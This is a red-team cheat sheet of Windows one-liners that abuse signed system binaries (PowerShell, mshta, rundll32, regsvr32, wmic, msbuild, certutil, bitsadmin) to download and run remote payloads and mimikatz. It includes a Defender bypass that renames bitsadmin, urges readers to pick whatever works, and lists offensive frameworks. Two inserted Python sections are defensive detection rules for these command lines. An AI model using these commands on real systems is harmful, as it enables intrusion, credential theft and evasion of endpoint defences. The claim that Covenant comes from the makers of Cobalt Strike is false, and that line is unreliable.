A curated list of tools and techniques, written from experience in red teaming and weaponizing malware in enterprise environments, for triggering attacker exploitation code.
The methods outlined below are used to execute payloads on a local machine, hosted from a remote server, or run in memory.
There are endless methods and obfuscation techniques here; test them and choose one that works in your environment.
- Invoke-Obfuscation guide: Infamous PowerShell obfuscator by Daniel Bohannon
- Invoke-CradleCrafter: Cradle obfuscator by Daniel Bohannon
- Powershell without Powershell.exe
- Powershell Download Cradles
Basic examples to execute in memory:
powershell -nop -c IEX(New-Object Net.WebClient).DownloadString('https://Domain.com/Payload.ps1')
powershell -c IEX (IWR 'https://Domain.com/Payload.ps1')
Powershell from a WebDAV server:
powershell -exec bypass -f \\webdavserver\folder\payload.ps1
PowerLine - Compile the EXE, then transfer it to the victim machine to execute PowerShell commands without Powershell.exe. It has to be compiled with the scripts you wish to load included in its config (e.g. PowerUp.ps1, Invoke-Mimikatz.ps1).
PowerLine.exe -ShowScripts
PowerLine.exe PowerUp "Invoke-AllChecks"
Mshta.exe: Microsoft binary that executes HTML Application (HTA) files or inline scripts. Frameworks such as Empire, Metasploit and Unicorn all output payloads in the HTA file format.
1. mshta vbscript:Close(Execute("GetObject(""script:http://WebServer/payload.sct"")"))
2. mshta https://WebServer/payload.hta
3. mshta \\WebDAVserver\folder\payload.hta
Rundll32.exe: Microsoft binary that executes code inside a .DLL file. Custom DLLs can be written in languages such as C# to fully bypass detection.
rundll32 C:\yourfile.dll,EntryPoint
--> yourfile.dll is your malicious .DLL
--> EntryPoint is the function called within the .DLL
Run inline VBscript:
rundll32 vbscript:"\..\mshtml,RunHTMLApplication "+String(CreateObject("WScript.Shell").Run("Wscript.Echo ""Hi there!"""),0)
Run remote SCT payload:
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://WebServer/payload.sct");window.close();
MSBuild.exe: Windows .NET executable that builds and executes custom C# project files on the fly. Running a local payload XML or .csproj file:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe Payload.xml
Hosted on a WebDAV server to run in memory:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\WebDAVserver\Payload.xml
Regsvr32.exe: Windows command-line tool to register and unregister DLL files. Can be used to bypass some controls such as AppLocker.
Method 1: Web server delivery. The scriptlet is written to disk in the IE local cache. Command to run on the target machine:
regsvr32 /u /n /s /i:http://yourdomain.com/payload.sct scrobj.dll
Method 2: WebDAV server. The scriptlet is written to disk in the WebDAV client local cache. Command to run on the target machine:
regsvr32 /u /n /s /i:\\WebDavServer\tmp\payload.sct scrobj.dll
Wmic.exe: Use WMIC to execute a local or remote XSL (eXtensible Stylesheet Language) file that contains scripting.
Execute a local/remote file:
wmic os get /format:"https://yourdomain/payload.xsl"
Execute a command:
wmic process call create "cmd.exe /c shell.exe"
Cscript.exe and Wscript.exe are both part of the Windows Script Host (WSH), which provides scripting capabilities. Cscript.exe executes VBS, JS and WSH scripts entirely on the command line; Wscript.exe does the same but pops up a Windows dialog box for user interaction.
- Cscript.exe application whitelisting bypass methods:
1. Run locally
cscript.exe testscript.vbs
2. WebDAV server
cscript //E:jscript \\WebDavServer\folder\payload.vbs
Msiexec.exe: Windows ships with the Windows Installer engine for installing new apps from MSI packages. Malicious .msi files can be created to execute payloads.
msiexec /q /i http://YourDomain/payload.msi
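The execution methods above all share a telemetry shape a defender can key on: a signed Windows binary launched with a URL, a UNC path, an inline `vbscript:`/`javascript:` protocol, or a scriptlet/XSL handler on its command line. The following Python is an added detection sketch, not code from the original list or any of the projects it names. It assumes process-creation events (Sysmon Event ID 1 or similar) already parsed into dicts with `Image` and `CommandLine` fields; the sample events and their `Id` values are constructed here, not real telemetry.

```python
"""Detection sketch for the LOLBin execution methods above (added example).

Assumes process-creation events parsed into dicts with 'Image' and
'CommandLine'; SAMPLE_EVENTS is constructed, not real telemetry."""
import ntpath
import re
from typing import Dict, List, Tuple

# (rule name, image basename pattern, command-line pattern).  The command-line
# patterns follow the argument shapes shown above: URLs, UNC paths, inline
# script protocols and scriptlet/XSL handlers handed to signed Windows binaries.
RULES: List[Tuple[str, str, str]] = [
    ("powershell_download_cradle", r"powershell(\.exe)?",
     r"(?i)(?=.*\b(iex|invoke-expression)\b)(?=.*(downloadstring|\biwr\b|invoke-webrequest))"),
    ("powershell_unc_script", r"powershell(\.exe)?", r"(?i)-(f|file)\s+\\\\"),
    ("mshta_remote_or_inline", r"mshta(\.exe)?", r"(?i)(https?://|\\\\|vbscript:|javascript:)"),
    ("rundll32_script_host", r"rundll32(\.exe)?", r"(?i)(javascript:|vbscript:|mshtml,RunHTMLApplication)"),
    ("msbuild_unc_project", r"msbuild(\.exe)?", r"(?i)\\\\\S+\.(xml|csproj)\b"),
    ("regsvr32_scriptlet", r"regsvr32(\.exe)?", r"(?i)/i:\S+.*scrobj\.dll"),
    ("wmic_xsl_or_spawn", r"wmic(\.exe)?", r"(?i)(/format:\S*(https?://|\\\\|\.xsl)|process\s+call\s+create)"),
    ("wsh_unc_script", r"[cw]script(\.exe)?", r"\\\\"),
    ("msiexec_remote_package", r"msiexec(\.exe)?", r"(?i)/i\s+(https?://|\\\\)"),
]


def match_rules(event: Dict[str, str]) -> List[str]:
    """Return the names of every rule the event trips (empty list if benign)."""
    # ntpath splits Windows backslash paths correctly even when run on Linux.
    image = ntpath.basename(event.get("Image", "")).lower()
    cmd = event.get("CommandLine", "")
    return [name for name, image_re, cmd_re in RULES
            if re.fullmatch(image_re, image) and re.search(cmd_re, cmd)]


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, str]]:
    """Flatten hits into (event id, rule name) pairs, in event order."""
    return [(int(e["Id"]), hit) for e in events for hit in match_rules(e)]


# Constructed events: the first seven mirror the command lines listed above,
# the last three are benign look-alikes that must not fire.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Id": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -c IEX(New-Object Net.WebClient).DownloadString('https://Domain.com/Payload.ps1')"},
    {"Id": 2, "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": r"mshta \\WebDAVserver\folder\payload.hta"},
    {"Id": 3, "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://WebServer/payload.sct");window.close();'},
    {"Id": 4, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32 /u /n /s /i:http://yourdomain.com/payload.sct scrobj.dll"},
    {"Id": 5, "Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "CommandLine": 'wmic os get /format:"https://yourdomain/payload.xsl"'},
    {"Id": 6, "Image": r"C:\Windows\System32\cscript.exe",
     "CommandLine": r"cscript //E:jscript \\WebDavServer\folder\payload.vbs"},
    {"Id": 7, "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": "msiexec /q /i http://YourDomain/payload.msi"},
    {"Id": 8, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c Get-Process | Sort-Object CPU"},
    {"Id": 9, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": r'regsvr32 /s "C:\Program Files\Vendor\vendor.dll"'},
    {"Id": 10, "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec /i C:\installers\app.msi /qn"},
]

if __name__ == "__main__":
    for event_id, rule in scan(SAMPLE_EVENTS):
        print(f"event {event_id}: {rule}")
```

The image check uses the basename only, so the rules also fire when the binary is invoked from a non-default directory; they do not fire when the binary itself has been renamed, which the download section below addresses separately with the `OriginalFileName` field.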
The methods listed below are used to transfer and download remote files onto target machines.
Windows one-liners to download a remote payload and execute arbitrary code.
PowerShell is the most pervasive method these days; it may be monitored by the blue team, logged for later analysis and possibly blocked in some environments.
# DownloadFile method
powershell -c (New-Object System.Net.WebClient).DownloadFile("https://example.com/archive.zip", "%temp%\archive.zip")
# Invoke-WebRequest method
powershell -c IWR "https://example.com/mimikatz.exe" -OutFile ".\mimikatz.exe"
# wget alias for Invoke-WebRequest in PowerShell (Windows 8 and later)
PS# wget "http://www.yourdomain.com/file.exe" -outfile "OutputFile.exe"
Curl.exe: tool shipped with Linux and Windows 10 (build 17063 and later) that can be used to bypass download controls. Reference: https://medium.com/@reegun/curl-exe-is-the-new-rundll32-exe-lolbin-3f79c5f35983
curl -o nc.exe https://yourdomain.com/nc.exe
Certutil.exe: Windows built-in binary for downloading remote files and encoding or decoding them. Blocked on recent builds of Windows 10 with Defender.
certutil -urlcache -f https://download.sysinternals.com/files/PSTools.env pstools.env
certutil -decode pstools.env pstools.zip
Bitsadmin.exe: Windows command-line utility for managing BITS jobs and transferring files. Blocked by modern Windows 10 Defender, but it can be copied to another EXE to bypass this.
Basic example:
bitsadmin /transfer job https://Domain.com/Payload.ps1 Payload.ps1
Method to bypass Windows 10 Defender by copying bitsadmin.exe to a separate file for execution:
copy /Y C:\Windows\System32\bitsadmin.exe %temp%\Update.exe
%temp%\Update.exe /transfer newjob https://Domain.com/mimikatz.exe %temp%\mimikatz.exe
PowerShell method:
PS# Start-BitsTransfer https://Domain.com/mimikatz.exe %temp%\mimikatz.exe
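The copy-and-rename trick above defeats any detection keyed on the image name alone, since the process now shows up as Update.exe. Sysmon Event ID 1 also records the OriginalFileName read from the binary's version resource, which survives a rename, so the download rules can be keyed on that field instead and a mismatch between it and the on-disk name becomes a finding in its own right. The Python below is an added example, not code from the original list; the events, their `Id` values and the `OriginalFileName` strings are constructed here, not real telemetry.

```python
"""Detection for the download methods above, including renamed copies of the
binaries (added example).  Assumes Sysmon Event ID 1 style dicts carrying
'Image', 'OriginalFileName' and 'CommandLine'; SAMPLE_EVENTS is constructed."""
import ntpath
import re
from typing import Dict, List

# Command-line shapes that indicate a download or decode, keyed by the
# binary's compiled-in (version-resource) file name, so a rename on disk does
# not change which rule applies.
DOWNLOAD_PATTERNS: Dict[str, str] = {
    "bitsadmin.exe": r"(?i)/transfer\b",
    "certutil.exe": r"(?i)-(urlcache|decode|encode)\b",
    "curl.exe": r"(?i)(\s-o\s|\s--output\s)",
    "powershell.exe": r"(?i)(downloadfile|downloadstring|invoke-webrequest|\biwr\b|\bwget\b|start-bitstransfer)",
}


def triage(event: Dict[str, str]) -> List[str]:
    """Return findings for one process-creation event (empty list if benign)."""
    image = ntpath.basename(event.get("Image", "")).lower()
    original = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "")
    findings: List[str] = []
    # A known download binary whose on-disk name differs from its compiled-in
    # name has been copied or renamed; that alone is worth an alert.
    if original in DOWNLOAD_PATTERNS and original != image:
        findings.append(f"renamed_lolbin:{original}->{image}")
    # Judge the command line by the original name, so the renamed copy is
    # still evaluated with the bitsadmin rule, not ignored as Update.exe.
    key = original if original in DOWNLOAD_PATTERNS else image
    pattern = DOWNLOAD_PATTERNS.get(key)
    if pattern and re.search(pattern, cmd):
        findings.append(f"download_tool_use:{key}")
    return findings


def triage_all(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map each event id to its findings."""
    return {int(e["Id"]): triage(e) for e in events}


# Constructed events: 1-4 mirror the download commands above (1 is the renamed
# bitsadmin copy), 5-6 are benign uses of the same binaries.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"Id": 1, "Image": r"C:\Users\alice\AppData\Local\Temp\Update.exe",
     "OriginalFileName": "bitsadmin.exe",
     "CommandLine": r"%temp%\Update.exe /transfer newjob https://Domain.com/mimikatz.exe %temp%\mimikatz.exe"},
    {"Id": 2, "Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil -urlcache -f https://download.sysinternals.com/files/PSTools.env pstools.env"},
    {"Id": 3, "Image": r"C:\Windows\System32\curl.exe", "OriginalFileName": "curl.exe",
     "CommandLine": "curl -o nc.exe https://yourdomain.com/nc.exe"},
    {"Id": 4, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": r"powershell Start-BitsTransfer https://Domain.com/mimikatz.exe %temp%\mimikatz.exe"},
    {"Id": 5, "Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": r"certutil -verify C:\certs\server.cer"},
    {"Id": 6, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE",
     "CommandLine": r"powershell -c Get-ChildItem C:\Logs"},
]

if __name__ == "__main__":
    for event_id, findings in triage_all(SAMPLE_EVENTS).items():
        print(f"event {event_id}: {findings or 'clean'}")
```

Keying on OriginalFileName is only as good as the telemetry source: Windows Security event 4688 does not carry that field, so on hosts without Sysmon the renamed-copy check falls back to file-creation events for copies of system binaries into user-writable directories.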
- Veil Evasion: Generate Metasploit based payloads. Includes payload type and encoding options.
- Lucky Strike: PowerShell tool for creating malicious Macro documents.
- Shellter: Automated anti-virus evasion toolkit for payload development.
- Magic Unicorn: Python script by TrustedSec (Dave Kennedy) to generate PowerShell commands and payloads as well as various file type payloads (HTA, Macro, Certutil). It also accepts Cobalt Strike shellcode payloads in C#.
- Powershell Empire: Post-exploitation framework built in Powershell for setting up Listeners, receiving connecting Agents, executing payload Modules and more.
- Cobalt Strike: Red teaming framework of choice for many professionals. Costly but effective.
- Covenant: Open source framework from the makers of Cobalt Strike. Created in C# (.NET Core). Runs and interacts in a similar fashion to Powershell Empire.
- Metasploit: Standard Kali Linux framework, used by hackers, pentesters and script-kiddies alike.